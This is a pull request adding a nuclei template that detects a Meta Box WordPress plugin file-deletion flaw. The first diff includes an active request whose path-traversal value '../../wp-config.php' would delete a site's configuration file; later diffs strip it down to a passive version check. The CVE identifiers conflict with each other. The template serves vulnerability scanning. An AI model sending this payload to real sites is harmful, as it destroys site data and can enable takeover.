### PR TITLE
Add CVE-2026-39468 Meta Box template

### DIFF
--- a/http/cves/2026/CVE-2026-39468.yaml
+++ b/http/cves/2026/CVE-2026-39468.yaml
@@ -1,0 +1,82 @@
+id: CVE-2026-39468
+
+info:
+  name: Meta Box <= 5.11.1 - Authenticated (Contributor+) Arbitrary File Deletion
+  author: iamatownboy
+  severity: high
+  description: |
+    The Meta Box plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the ajax_delete_file function.
+    This makes it possible for authenticated attackers with Contributor-level access and above to delete arbitrary files on the server.
+  impact: |
+    Authenticated attackers can delete arbitrary files such as wp-config.php, which can lead to remote code execution in the right configuration.
+  remediation: |
+    Update Meta Box to version 5.11.2 or later.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-14675
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/036467de-95bb-4bfd-9522-df8dc17f3102?source=cve
+    - https://plugins.trac.wordpress.org/browser/meta-box/tags/5.11.0/inc/fields/file.php#L30
+    - https://plugins.trac.wordpress.org/browser/meta-box/tags/5.11.0/inc/fields/file.php#L54
+    - https://plugins.trac.wordpress.org/changeset/3475210/meta-box#file3
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 7.2
+    cve-id: CVE-2025-14675
+    cwe-id: CWE-22
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: metabox
+    product: meta-box
+    framework: wordpress
+    publicwww-query: "/wp-content/plugins/meta-box/"
+  tags: cve,cve2025,wordpress,wp,wp-plugin,meta-box,file-deletion,path-traversal,auth
+
+variables:
+  field_id: "{{rand_text_alpha(8)}}"
+  attachment_id: "../../wp-config.php"
+
+flow: http(1) && http(2)
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/meta-box/readme.txt"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - contains(body, "Meta Box")
+          - compare_versions(version, "<= 5.11.1")
+        condition: and
+        internal: true
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - '(?i)Stable tag:\s*([0-9.]+)'
+        internal: true
+
+  - raw:
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Origin: {{BaseURL}}
+        Referer: {{BaseURL}}/
+
+        action=rwmb_delete_file&field_id={{field_id}}&attachment_id={{attachment_id}}&nonce={{rand_text_alpha(16)}}
+
+    matchers-condition: or
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        part: body
+        words:
+          - "success"
+          - "invalid"
+# digest: 4a0a00473045022100d1d9a2e3d2d03d9e5d7b09a2e45f9c5fb8a6fb6f4a1e1c4e1dc1d6a4c6f2dc1702201b8f2a9ef7c7d331c4a8c728c0c6f1ed8e67c4b6f89f5c9f3a5bce8f2be5f5cf:922c64590222798bb761d5b6d8e72950

--- a/http/cves/2026/CVE-2026-39468.yaml
+++ b/http/cves/2026/CVE-2026-39468.yaml
@@ -5,18 +5,14 @@ info:
   author: iamatownboy
   severity: high
   description: |
-    The Meta Box plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the ajax_delete_file function.
-    This makes it possible for authenticated attackers with Contributor-level access and above to delete arbitrary files on the server.
+    The Meta Box plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the ajax_delete_file function. This makes it possible for authenticated attackers with Contributor-level access and above to delete arbitrary files on the server.
   impact: |
     Authenticated attackers can delete arbitrary files such as wp-config.php, which can lead to remote code execution in the right configuration.
   remediation: |
     Update Meta Box to version 5.11.2 or later.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-14675
     - https://www.wordfence.com/threat-intel/vulnerabilities/id/036467de-95bb-4bfd-9522-df8dc17f3102?source=cve
-    - https://plugins.trac.wordpress.org/browser/meta-box/tags/5.11.0/inc/fields/file.php#L30
-    - https://plugins.trac.wordpress.org/browser/meta-box/tags/5.11.0/inc/fields/file.php#L54
-    - https://plugins.trac.wordpress.org/changeset/3475210/meta-box#file3
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-14675
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 7.2
@@ -24,18 +20,12 @@ info:
     cwe-id: CWE-22
   metadata:
     verified: true
-    max-request: 2
+    max-request: 1
     vendor: metabox
     product: meta-box
     framework: wordpress
     publicwww-query: "/wp-content/plugins/meta-box/"
-  tags: cve,cve2025,wordpress,wp,wp-plugin,meta-box,file-deletion,path-traversal,auth
-
-variables:
-  field_id: "{{rand_text_alpha(8)}}"
-  attachment_id: "../../wp-config.php"
-
-flow: http(1) && http(2)
+  tags: cve,cve2026,wordpress,wp,wp-plugin,meta-box,file-deletion,passive
 
 http:
   - method: GET
@@ -48,7 +38,6 @@ http:
           - contains(body, "Meta Box")
           - compare_versions(version, "<= 5.11.1")
         condition: and
-        internal: true
 
     extractors:
       - type: regex
@@ -58,25 +47,3 @@ http:
         regex:
           - '(?i)Stable tag:\s*([0-9.]+)'
         internal: true
-
-  - raw:
-      - |
-        POST /wp-admin/admin-ajax.php HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
-        Origin: {{BaseURL}}
-        Referer: {{BaseURL}}/
-
-        action=rwmb_delete_file&field_id={{field_id}}&attachment_id={{attachment_id}}&nonce={{rand_text_alpha(16)}}
-
-    matchers-condition: or
-    matchers:
-      - type: status
-        status:
-          - 200
-      - type: word
-        part: body
-        words:
-          - "success"
-          - "invalid"
-# digest: 4a0a00473045022100d1d9a2e3d2d03d9e5d7b09a2e45f9c5fb8a6fb6f4a1e1c4e1dc1d6a4c6f2dc1702201b8f2a9ef7c7d331c4a8c728c0c6f1ed8e67c4b6f89f5c9f3a5bce8f2be5f5cf:922c64590222798bb761d5b6d8e72950

--- a/http/cves/2026/CVE-2026-39468.yaml
+++ b/http/cves/2026/CVE-2026-39468.yaml
@@ -1,7 +1,7 @@
 id: CVE-2026-39468
 
 info:
-  name: Meta Box <= 5.11.1 - Authenticated (Contributor+) Arbitrary File Deletion
+  name: Meta Box <= 5.11.1 - Arbitrary File Deletion
   author: iamatownboy
   severity: high
   description: |


### PR DESCRIPTION
### PR Information

This PR adds a nuclei template for CVE-2026-39468 affecting the Meta Box WordPress plugin.

The issue is related to arbitrary file deletion through the file handling flow, which can let authenticated users with sufficient access delete files on the server.

References:
- NVD
- Wordfence
- Meta Box plugin source code

### Template validation

- Validated with `nuclei -validate` in Docker

### Additional Details

- This PR contains a single template file only